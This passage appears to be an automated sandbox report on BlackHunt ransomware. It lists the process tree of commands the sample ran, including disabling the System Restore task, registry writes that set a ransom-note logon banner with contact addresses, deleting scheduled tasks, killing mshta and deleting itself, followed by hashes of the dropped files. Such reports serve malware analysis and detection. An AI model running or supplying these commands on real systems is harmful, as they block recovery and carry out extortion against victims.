                                                                                                                                                                    PID:1720
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2164
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1320
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3176
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1800
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2548
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3380
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:1020
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1704
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2976
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3292
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2516
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1512
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:1524
                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                              taskkill /IM mshta.exe /f
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:2796
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2512
                                                                                                                                                                                              • C:\Windows\system32\notepad.exe
                                                                                                                                                                                                notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:928
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1880
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\009af0f0e2131605b1fd2888c324f6ed29e0053b2caf18cab5764fd0795321ca.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Deletes itself
                                                                                                                                                                                                  PID:1864
                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                    ping 127.0.0.1 -n 5
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:3888
                                                                                                                                                                                              • C:\Windows\system32\wbengine.exe
                                                                                                                                                                                                "C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:3756
                                                                                                                                                                                              • C:\Windows\System32\vdsldr.exe
                                                                                                                                                                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:2464
                                                                                                                                                                                                • C:\Windows\System32\vds.exe
                                                                                                                                                                                                  C:\Windows\System32\vds.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3172
                                                                                                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                    PID:1756

                                                                                                                                                                                                  Network

                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e7bdac02028acf327bf9b3674f55e27a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          26f6d656f210a86bece0cadd3c588053462dc10c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9bcf42cb5809577eb8b9f3f56033a36dcd772a5f74684e3fe11a086d6d03055a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          58ee861eb5dec67d1319d5816f7d1b2a4a22e4167fb7db7baf4e216fcb71d65de67a3dbea45e785d0f7add985d93db6ed104344f5d1d96f528da76e2c2cd2823

                                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          684B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7ecc183719c90dbe722edbfcc43306ec

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          4e7a4f7eca21ab68214ea8d63c92d59a9d2a384a

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          b8e897d1c0d07712d6ad19a5c3a75ad2f61fe901ce815326e52f0774c6bdfa69

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b4332d63bbcabbf682be7c72b7e14f9db68eed6b5234662b9b64bf04fcb19b80ba90bbe543d2089e134c76490ce819ec08d7ad032ad36478d896b0cd4756f226

                                                                                                                                                                                                        • \Device\HarddiskVolume1\#BlackHunt_ReadMe.hta

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          4KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d5648e8af3b5e6f7194e29de141c906d

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f5cf2060df92ab40ee6511eeb381c757c2beb6bc

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          1095ddbab7f99cd36afb91ed0bb3f79e820debc111d8c76e0397988ac69c3e15

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          ef03856007a5ef9b5b3c1eac09b043d120342d7996f49284527bc4244115221762679cf5fb8286ba52eb408be7d515ee4edb4b2be9079d8e8eae17ec1bea1684